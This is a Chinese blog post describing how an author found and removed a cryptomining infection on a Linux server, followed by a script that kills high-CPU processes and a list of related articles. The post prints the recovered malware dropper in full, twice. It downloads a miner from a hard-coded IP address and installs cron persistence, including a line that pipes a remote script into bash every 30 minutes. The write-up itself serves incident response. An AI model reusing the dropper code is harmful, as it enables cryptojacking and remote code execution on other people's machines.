Linux下CPU1000%记一次挖矿病毒清理流程

今天top后发现一个进程CPU高1795%,判断是病毒

查找进程ps -elf|grep 进程idpid和ppid查找到sleep进程

ps -ef|grep 4277

查看具体进程内容,ll /proc/进程idpid

ll /proc/4277

ls -l /proc/{pid号}
ls -l /proc/{pid号}/exe

 kill掉病毒进程

 排查病毒代码位置

排查 www用户执行所有进程

ps -ef|grep www 发现

36239 www       20   0   76272   4976    452 S   0.3  0.0 174:24.97 .image.jpg
/tmp/.image.jpg (deleted)
www      202401  0.0  0.0 113292  1516 ?        S    07:01   0:00 /var/tmp/.x/secure -c
www      248458      1  0 08:01 ?        00:00:00 /var/tmp/.x/secure -c
www       3241  0.1  0.0 113724  1836 ?        S    4月01 151:10 /bin/sh ./php
www       3243  0.1  0.0 113724  1844 ?        S    4月01 151:49 /bin/sh ./php
/proc/3243/exe -> /usr/bin/bash/tmp/.XIM-unix/admin/.sftp (deleted)
/tmp/.XIM-unix/admin/.sftp (deleted)
exe -> /usr/bin/bash#!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ ?link1="http://95.214.24.102:6972/xrx/xrx" ?link2="http://95.214.24.102:6972/configs/config-xrx.json" ?mkdir /var/tmp/.xrx ?cd /var/tmp/.xrx/ ?chattr -ia /var/tmp/.xrx/xrx ?chattr -ia /var/tmp/.xrx/config.json ?rm -rf /var/tmp/.xrx/xrx ?rm -rf /var/tmp/.xrx/config.json ?curl  -L -O $link1 || cd1  -L -O $link1 || wget $link1 --no-check-certificate ?curl  -L -O $link2 || cd1  -L -O $link2 || wget $link2 --no-check-certificate ?mv config-xrx.json config.json ?chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( $EUID != 0 )); then ?if ! crontab -l | grep -q 'secure'; then ?cd /dev/shm ?rm -rf /dev/shm/.spark ?echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?echo "*/30 * * * * curl 95.214.24.102:1011/next | bash " >> .spark ?crontab .spark ?sleep 2 ?rm -rf /dev/shm/.spark ?fi fi if (( $EUID == 0 )); then ?if ! cat /etc/crontab | grep -q 'secure'; then ?echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab ?echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?echo "*/30 * * * * root curl 95.214.24.102:1011/next | bash " >> /etc/crontab ?fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then ?echo "miner intact" ?else ?echo "miner not found,downloading..." ?downloadminer fi if [[ "$fsiz" -gt 0 ]]; then ?echo "miner size intact" ?else ?echo "filesize 0,downloading..." ?downloadminer fi } ######################## ######################## gettingmineru crontablegend  if test -z "$ifrunning" ; then ?echo "xrx not running,starting..." ?/var/tmp/.xrx/xrx </dev/null &>/dev/null & disown  -h  %1 ?sleep 1 ?echo -e "pid:" ?pgrep xrx fi  /var/tmp/.x/secure

 发现病毒文件

www      248458      1  0 08:01 ?        00:00:00 /var/tmp/.x/secure -c

16393 www       20   0  107740  73912      4 S   0.3  0.0   0:03.88 sh
/tmp/.XIM-unix/admin/sh (deleted)

#!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ ?
link1="http://95.214.24.102:6972/xrx/xrx" ?
link2="http://95.214.24.102:6972/configs/config-xrx.json" ?mkdir /var/tmp/.xrx ?
cd /var/tmp/.xrx/ ?
chattr -ia /var/tmp/.xrx/xrx ?
chattr -ia /var/tmp/.xrx/config.json ?
rm -rf /var/tmp/.xrx/xrx ?
rm -rf /var/tmp/.xrx/config.json ?
curl  -L -O $link1 || cd1  -L -O $link1 || wget $link1 --no-check-certificate ?
curl  -L -O $link2 || cd1  -L -O $link2 || wget $link2 --no-check-certificate ?
mv config-xrx.json config.json ?chmod +x /var/tmp/.xrx/xrx }######################## ######################## 
crontablegend(){ if (( $EUID != 0 )); then ?
if ! crontab -l | grep -q 'secure'; then ?
cd /dev/shm ?
rm -rf /dev/shm/.spark ?
echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?
sleep 1 ?
echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?
echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?
echo "*/30 * * * * curl 95.214.24.102:1011/next | bash " >> .spark ?crontab .spark ?
sleep 2 ?rm -rf /dev/shm/.spark ?fi fi if (( $EUID == 0 )); then ?
if ! cat /etc/crontab | grep -q 'secure'; then ?
echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?
echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab ?
echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?
echo "*/30 * * * * root curl 95.214.24.102:1011/next | bash " >> /etc/crontab ?fi fi }######################## ######################## 
gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then ?
echo "miner intact" ?else ?echo "miner not found,downloading..." ?
downloadminer fi if [[ "$fsiz" -gt 0 ]]; then ?echo "miner size intact" ?else ?
echo "filesize 0,downloading..." ?downloadminer fi } 
######################## ######################## 
gettingmineru crontablegend  if test -z "$ifrunning" ; then ?echo "xrx not running,starting..." ?
/var/tmp/.xrx/xrx </dev/null &>/dev/null & disown  -h  %1 ?sleep 1 ?echo -e "pid:" ?pgrep xrx fi  /var/tmp/.x/secure

查找进程ps -elf|grep 进程idpid和ppid查找到sleep进程 

 

 病毒执行代码

#!/bin/bash
cd -- /tmp/.XIM-unix/admin
cp -f -- .sh sh
./sh -c >/dev/null 2>&1
./.php -c >/dev/null 2>&1
rm -rf sh

 删除病毒代码

rm -rf admin

----------------------------------------------------------------------------------------

解决 linux top cpu超100 kill 脚本

在Linux系统中,top命令是一个常用的性能分析工具,它可以实时显示系统的进程信息。如果您希望监控CPU使用率超过100%的进程,并在发现时杀死这些进程,可以编写一个简单的脚本来实现这个功能。

以下是一个简单的Bash脚本示例,它会定期运行top命令,并在发现CPU使用率超过100%的情况下杀死相应的进程:

#!/bin/bash# 定义一个函数来检查CPU使用率并杀死进程
check_kill_process() {top_output=$(top -b -n 1 | grep "R" | awk '{if($9 > 100.0) print $1}')for pid in $top_output; dokill -9 $pid 2>/dev/nullecho "Killed PID $pid because its CPU usage is greater than 100%"done
}# 主循环,每隔一定时间运行检查函数
while true; docheck_kill_processsleep 5  # 每隔5秒检查一次
done

请注意,该脚本使用了top命令的-b(批处理模式)和-n(指定循环次数)选项,以及管道(|)和grepawk等命令来分析和处理输出。脚本会无限循环地运行,每5秒检查一次系统进程的CPU使用情况,并在发现CPU使用率超过100%时杀死相应的进程。

在运行这个脚本之前,请确保您对其中使用的命令和行为有足够的了解,并且已经考虑到了可能对系统稳定性造成的影响。此外,这个脚本应该在有足够权限的用户下运行,通常是root用户。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/19786.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

springboot+vue 社区养老服务系统

Springbootvue社区居家养老服务系统&#xff0c;数据库mysql&#xff0c;mybatis框架&#xff0c;有可视化页面。 功能&#xff1a; 用户管理 养老服务管理 护理人员管理 服务类型管理 健康状况管理 社区管理 服务区管理 娱乐资讯管理 咨询分类管理 反馈建议 系统简历管理 轮播…

opencv-python(一)

1. 图片加载与显示 import cv2 import numpy as npif __name__"__main__":rose cv2.imread(./rose.jpeg)print(rose.shape)print(type(rose))cv2.imshow(rose,rose) # 弹出窗口cv2.waitKey() # 等待键盘输入&#xff0c;任意输入&#xff0c;触发这行代码&#xff…

开源硬件初识——Orange Pi AIpro(8T)

开源硬件初识——Orange Pi AIpro&#xff08;8T&#xff09; 大抵是因为缘&#xff0c;妙不可言地就有了这么一块儿新一代AI开发板&#xff0c;乐于接触新鲜玩意儿的小火苗噌一下就燃了起来。 还没等拿到硬件&#xff0c;就已经开始在Orange Pi AIpro 官网上查阅起资料&…

【简单介绍下Milvus,什么是Milvus?】

&#x1f308;个人主页: 程序员不想敲代码啊 &#x1f3c6;CSDN优质创作者&#xff0c;CSDN实力新星&#xff0c;CSDN博客专家 &#x1f44d;点赞⭐评论⭐收藏 &#x1f91d;希望本文对您有所裨益&#xff0c;如有不足之处&#xff0c;欢迎在评论区提出指正&#xff0c;让我们共…

ROS无人机追踪小车项目开发实战 | 第四届中国智能汽车创新大会圆满结束

2024年5月26日&#xff0c;阿木实验室在深圳第四届中国智能汽车创新大会上&#xff0c;开展的《Prometheus开源平台-ROS无人机追踪小车项目开发实战课》圆满结束。 该实战课从初学者的角度出发&#xff0c;通过实践性讲解和开发&#xff0c;使开发者们系统地学习了硬件系统架构…

【html】用html模拟微信布局

您做的这个模拟微信布局的作品很不错,使用了Flexbox布局来实现元素的灵活排列。以下是关于您代码的一些分析和建议: 效果图: 代码分析: 全局样式重置: 您使用了* { margin: 0; padding: 0; }来重置所有元素的边距。这是一个常见的做法,可以避免不同浏览器默认样式的差…

js四舍五入和计算精度问题处理

js四舍五入和计算精度问题处理 目录 js四舍五入和计算精度问题处理错误计算方法示例代码 js中加减乘除&#xff0c;部分数据会存在计算不准确。 错误计算 我使用的是big.js&#xff0c;基于big.js库封装了下工具方法&#xff0c;当然也可以用其他库&#xff0c;如mathjs/bignu…

找回xmind文件办法:一切意外均可找回(误删/重启关机等)

我周三编辑完&#xff0c;周四下午评审完用例忘记保存 结果到了快乐星期五&#xff0c;由于是周五我太开心了...早上到公司后觉得电脑卡&#xff0c;直接点了重启啥都没保存啊啊啊啊啊 准备上传测试用例时才想起来我的用例找不见了&#xff01;&#xff01;&#xff01;&…

Go微服务: 封装nacos-sdk-go的v2版本与应用

概述 基于前文&#xff1a;https://active.blog.csdn.net/article/details/139213323我们基于此SDK提供的API封装一个公共方法来用于生产环境 封装 nacos-sdk-go 我们封装一个 nacos.go 文件, 这个是通用的工具库 package commonimport ("fmt""github.com/nac…

使用LeanCloud平台的即时通讯

LeanCloud 是领先的 Serverless 云服务&#xff0c;为产品开发提供强有力的后端支持&#xff0c;旨在帮助开发者降低研发、运营维护等阶段投入的精力和成本。 LeanCloud 整合了各项服务&#xff0c;让开发者能够聚焦在核心业务上&#xff0c;为客户创造更多价值。 *即时通讯 …

基于安卓的虫害识别软件设计--(1)模型训练与可视化

引言 简介&#xff1a;使用pytorch框架&#xff0c;从模型训练、模型部署完整地实现了一个基础的图像识别项目计算资源&#xff1a;使用的是Kaggle&#xff08;每周免费30h的GPU&#xff09; 1.创建名为“utils_1”的模块 模块中包含&#xff1a;训练和验证的加载器函数、训练…

【Python爬虫--scrapy+selenium框架】超详细的Python爬虫scrapy+selenium框架学习笔记(保姆级别的,非常详细)

六&#xff0c;selenium 想要下载PDF或者md格式的笔记请点击以下链接获取 python爬虫学习笔记点击我获取 Scrapyselenium详细学习笔记点我获取 Python超详细的学习笔记共21万字点我获取 1&#xff0c;下载配置 ## 安装&#xff1a; pip install selenium## 它与其他库不同…

【C++】C++11新特性:列表初始化、声明、新容器、右值引用、万能引用和完美转发

目录 一、列表初始化 1.1 { } 初始化 1.2 std::initializer_list 二、声明 2.1 auto 2.2 decltype 2.3 nullptr 三、新容器 四、右值引用和移动语义 4.1 左值和左值引用 4.2 右值和右值引用 4.3 左值引用与右值引用比较 4.4 右值引用使用场景和意义&#xff1a;移…

万字长文深度解析Agent反思工作流框架Reflexion下篇:ReflectionAgent workflow

在前文[LLM-Agents]万字长文深度解析Agent反思工作流框架Reflexion中篇&#xff1a;React中&#xff0c;我们详细解析了ReactAgent的工作流程&#xff0c;而本文则将在此基础上探讨反思技巧的应用。之前的文章中[LLM-Agents]反思Reflection 工作流我们已经对反思技巧进行了探讨…

多维数组操作,不要再用遍历循环foreach了!来试试数组展平的小妙招!array.flat()用法与array.flatMap() 用法及二者差异详解

目录 一、array.flat&#xff08;&#xff09;方法 1.1、array.flat&#xff08;&#xff09;的语法及使用 ①语法 ②返回值 ③用途 二、array.flatMap() 方法 2.1、array.flatMap()的语法及作用 ①语法 ②返回值 ③用途 三、array.flat&#xff08;&#xff09;与a…

CLIP 源码分析:simple_tokenizer.py

tokenizer的含义 from .clip import *引入头文件时为什么有个. 正文 import gzip import html import os from functools import lru_cacheimport ftfy import regex as re# 上面的都是头文件# 这段代码定义了一个函数 default_bpe()&#xff0c;它使用了装饰器 lru_cache()。…

一维时间序列信号的改进小波降噪方法(MATLAB R2021B)

目前国内外对于小波分析在降噪方面的方法研究中&#xff0c;主要有小波分解与重构法降噪、小波阈值降噪、小波变换模极大值法降噪等三类方法。 (1)小波分解与重构法降噪 早在1988 年&#xff0c;Mallat提出了多分辨率分析的概念&#xff0c;利用小波分析的多分辨率特性进行分…

DAQmx Connect Terminals (VI) 信号路由作用及意义

DAQmx Connect Terminals是一个LabVIEW虚拟仪器&#xff08;VI&#xff09;&#xff0c;用于配置和连接数据采集系统中的物理终端或虚拟终端。这一功能在配置复杂的数据采集&#xff08;DAQ&#xff09;系统时非常重要&#xff0c;因为它允许用户在不改变硬件连接的情况下&…

Python——Selenium快速上手+方法(一站式解决问题)

目录 前言 一、Selenium是什么 二、Python安装Selenium 1、安装Selenium第三方库 2、下载浏览器驱动 3、使用Python来打开浏览器 三、Selenium的初始化 四、Selenium获取网页元素 4.1、获取元素的实用方法 1、模糊匹配获取元素 & 联合多个样式 2、使用拉姆达表达式 3、加上…

Python零基础-下【详细】

接上篇继续&#xff1a; Python零基础-中【详细】-CSDN博客 目录 十七、网络编程 1、初识socket &#xff08;1&#xff09;socket理解 &#xff08;2&#xff09;图解socket &#xff08;3&#xff09;戏说socket &#xff08;4&#xff09;网络服务 &#xff08;5&a…